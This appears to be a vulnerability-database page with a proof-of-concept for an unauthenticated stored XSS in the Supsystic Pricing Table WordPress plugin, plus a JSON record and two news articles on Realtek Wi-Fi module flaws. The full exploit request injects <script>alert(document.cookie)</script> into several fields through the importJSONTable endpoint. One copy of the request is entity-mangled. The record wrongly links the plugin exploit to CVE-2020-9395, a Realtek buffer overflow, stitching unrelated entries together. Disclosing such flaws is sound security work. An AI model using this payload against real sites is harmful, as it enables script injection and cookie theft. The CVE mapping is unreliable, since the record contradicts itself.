No permission check on the ImportJSONTable endpoint allows for malicious javascript to be injected by unauthenticated users.
### PoC
URL/wp-admin/admin-ajax.php?mod=tables&action;=importJSONTable&data;%5B0%5D%5Bid%5D=11&data;%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data;%5B0%5D%5Blabel%5D=&data;%5B0%5D%5Boriginal_id%5D=11&data;%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data;%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data;%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data;%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data;%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=&data;%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=&data;%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=&data;%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data;%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data;%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data;%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data;%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data;%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data;%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data;%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data;%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data;%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data;%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data;%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data;%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data;%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data;%5B0%5D%5Bhtml%5D=&data;%5B0%5D%5Bcss%5D=&data;%5B0%5D%5Bimg%5D=gradient-standard.jpg&data;%5B0%5D%5Bsort_order%5D=0&data;%5B0%5D%5Bis_base%5D=1&data;%5B0%5D%5Bis_pro%5D=0&data;%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data;%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data;%5B0%5D%5Bsession_id%5D=715993&data;%5B0%5D%5Bview_id%5D=ptsBlock_715993&data;%5B0%5D%5Bcat_code%5D=price_table&update;_with_same_id=1&pl;=pts&reqType;=ajax
{"cve": [{"lastseen": "2022-03-23T19:07:09", "description": "An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6. A stack-based buffer overflow exists in the client code that takes care of WPA2's 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer.", "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-06T22:15:00", "type": "cve", "title": "CVE-2020-9395", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.9, "vectorString": "AV:A/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9395"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-9395", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9395", "cvss": {"score": 4.9, "vector": "AV:A/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-02-15T22:20:21", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-9395"], "description": "No permission check on the ImportJSONTable endpoint allows for malicious javascript to be injected by unauthenticated users.\n", "modified": "2020-09-22T08:26:21", "published": "2020-02-25T00:00:00", "id": "WPEX-ID:61148EB6-021A-4055-AF61-CDD8F29EB226", "href": "", "type": "wpexploit", "title": "Pricing Table by Supsystic < 1.8.2 - Unauthenticated Stored XSS", "sourceData": "URL/wp-admin/admin-ajax.php?mod=tables&action=importJSONTable&data%5B0%5D%5Bid%5D=11&data%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data%5B0%5D%5Blabel%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Boriginal_id%5D=11&data%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data%5B0%5D%5Bhtml%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bcss%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bimg%5D=gradient-standard.jpg&data%5B0%5D%5Bsort_order%5D=0&data%5B0%5D%5Bis_base%5D=1&data%5B0%5D%5Bis_pro%5D=0&data%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data%5B0%5D%5Bsession_id%5D=715993&data%5B0%5D%5Bview_id%5D=ptsBlock_715993&data%5B0%5D%5Bcat_code%5D=price_table&update_with_same_id=1&pl=pts&reqType=ajax", "cvss": {"score": 4.9, "vector": "AV:A/AC:M/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:09", "description": "[](<https://thehackernews.com/images/-lW6HeTxTMuU/YBuwaY2Oj9I/AAAAAAAABr0/WTaUEEPE5wk2AvPPvBkqa3r2TcdnXlZQgCLcBGAsYHQ/s0/Realtek.jpg>)\n\nMajor vulnerabilities have been discovered in the Realtek RTL8195A Wi-Fi module that could have been exploited to gain root access and take complete control of a device's wireless communications.\n\nThe six flaws were [reported](<https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered>) by researchers from Israeli IoT security firm Vdoo.\n\nThe [Realtek RTL8195A](<https://www.realtek.com/en/products/communications-network-ics/item/rtl8195am>) module is a standalone, low-power-consumption Wi-Fi hardware module targeted at embedded devices used in several industries such as agriculture, smart home, healthcare, gaming, and automotive sectors.\n\nIt also makes use of an \"Ameba\" API, allowing developers to communicate with the device via Wi-Fi, HTTP, and [MQTT](<https://en.wikipedia.org/wiki/MQTT>), a lightweight messaging protocol for small sensors and mobile devices.\n\nAlthough the issues uncovered by Vdoo were verified only on RTL8195A, the researchers said they extend to other modules as well, including RTL8711AM, RTL8711AF, and RTL8710AF.\n\nThe flaws concern a mix of stack overflow, and out-of-bounds reads that stem from the Wi-Fi module's WPA2 [four-way handshake](<https://en.wikipedia.org/wiki/IEEE_802.11i-2004#Four-way_handshake>) mechanism during authentication.\n\n[](<https://thehackernews.com/images/-nF7One9swAc/YBus9VAcWZI/AAAAAAAABro/j_mvr2Xz91UpxmAletJwxU-qwCH0nfStACLcBGAsYHQ/s0/hacking.jpg>)\n\nChief among them is a buffer overflow vulnerability (CVE-2020-9395) that permits an attacker in the proximity of an RTL8195 module to completely take over the module, without having to know the Wi-Fi network password (or pre-shared key) and regardless of whether the module is acting as a Wi-Fi access point (AP) or client.\n\nTwo other flaws can be abused to stage a denial of service, while another set of three weaknesses, including CVE-2020-25854, could allow exploitation of Wi-Fi client devices and execute arbitrary code.\n\nThus in one of the potential attack scenarios, an adversary with prior knowledge of the passphrase for the WPA2 Wi-Fi network that the victim device is connected to can create a malicious AP by sniffing the network's SSID and Pairwise Transit Key (PTK) \u2014 which is used to encrypt traffic between a client and the AP \u2014 and force the target to connect to the new AP and run malicious code.\n\nRealtek, in response, has released Ameba Arduino 2.0.8 with patches for all the six vulnerabilities found by Vdoo. It's worth noting that firmware versions released after April 21, 2020, already come with the necessary protections to thwart such takeover attacks.\n\n\"An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6,\" the company [said](<https://www.amebaiot.com/en/security_bulletin/>) in a security bulletin. \"A stack-based buffer overflow exists in the client code that takes care of WPA2's 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-04T08:36:00", "type": "thn", "title": "Critical Bugs Found in Popular Realtek Wi-Fi Module for Embedded Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25854", "CVE-2020-9395"], "modified": "2021-02-04T08:36:00", "id": "THN:0FEF773F12072BBB0AE74955BCBE33FB", "href": "https://thehackernews.com/2021/02/critical-bugs-found-in-popular-realtek.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-DmjDDFPDoR0/YLjBP6MGWvI/AAAAAAAACu8/jaOuWaGopfou_ho1qczfxJWDZXm8TU1RQCLcBGAsYHQ/s0/Realtek-hacking.jpg>)\n\nA new set of critical vulnerabilities has been disclosed in the Realtek RTL8170C Wi-Fi module that an adversary could abuse to gain elevated privileges on a device and hijack wireless communications.\n\n\"Successful exploitation would lead to complete control of the Wi-Fi module and potential root access on the OS (such as Linux or Android) of the embedded device that uses this module,\" researchers from Israeli IoT security firm Vdoo [said](<https://www.vdoo.com/blog/realtek-wifi-vulnerabilities-zero-day>) in a write-up published yesterday.\n\nThe Realtek [RTL8710C](<https://www.amebaiot.com/en/ameba-arduino-getting-started-rtl8710/>) Wi-Fi SoC underpins Ameba, an Arduino-compatible programmable platform equipped with peripheral interfaces for building a variety of IoT applications by devices spanning across agriculture, automotive, energy, healthcare, industrial, security, and smart home sectors.\n\nThe flaws affect all embedded and IoT devices that use the component to connect to Wi-Fi networks and would require an attacker to be on the same Wi-Fi network as the devices that use the RTL8710C module or know the network's pre-shared key (PSK), which, as the name implies, is a cryptographic secret used to authenticate wireless clients on local area networks.\n\nThe findings follow an [earlier analysis](<https://thehackernews.com/2021/02/critical-bugs-found-in-popular-realtek.html>) in February that found similar weaknesses in the Realtek RTL8195A Wi-Fi module, chief among them being a buffer overflow vulnerability (CVE-2020-9395) that permits an attacker in the proximity of an RTL8195 module to completely take over the module without having to know the Wi-Fi network password.\n\n[](<https://thehackernews.com/images/-jT-Ij62Y3Ww/YLjAZSsvbnI/AAAAAAAACu0/bk5UPh5Avo4dsjOPkJ7hCP8KVQrwo9l9ACLcBGAsYHQ/s0/hacking.jpg>)\n\nIn the same vein, the RTL8170C Wi-Fi module's WPA2 [four-way handshake](<https://en.wikipedia.org/wiki/IEEE_802.11i-2004#Four-way_handshake>) mechanism is vulnerable to two stack-based buffer overflow vulnerabilities (CVE-2020-27301 and CVE-2020-27302, CVSS scores: 8.0) that abuse the attacker's knowledge of the PSK to obtain remote code execution on WPA2 clients that use this Wi-Fi module.\n\nAs a potential real-world attack scenario, the researchers demonstrated a proof-of-concept (PoC) exploit wherein the attacker masquerades as a legitimate access point and sends a malicious encrypted group temporal key (GTK) to any client (aka supplicant) that connects to it via WPA2 protocol. A group temporal key is used to secure all multicast and broadcast traffic.\n\nVdoo said there are no known attacks underway exploiting the vulnerabilities, adding firmware versions released after Jan. 11, 2021 include mitigations that resolve the issue. The company also recommends using a \"strong, private WPA2 passphrase\" to prevent exploitation of the above issues in scenarios where the device's firmware can't be updated.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T11:54:00", "type": "thn", "title": "Researchers Warn of Critical Bugs Affecting Realtek Wi-Fi Module", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27301", "CVE-2020-27302", "CVE-2020-9395"], "modified": "2021-06-03T11:55:49", "id": "THN:F5C882106D7F77972BB6ECD8F8D3A13D", "href": "https://thehackernews.com/2021/06/researchers-warn-of-critical-bugs.html", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}]}
Pricing Table by Supsystic < 1.8.2 - Unauthenticated Stored XSS
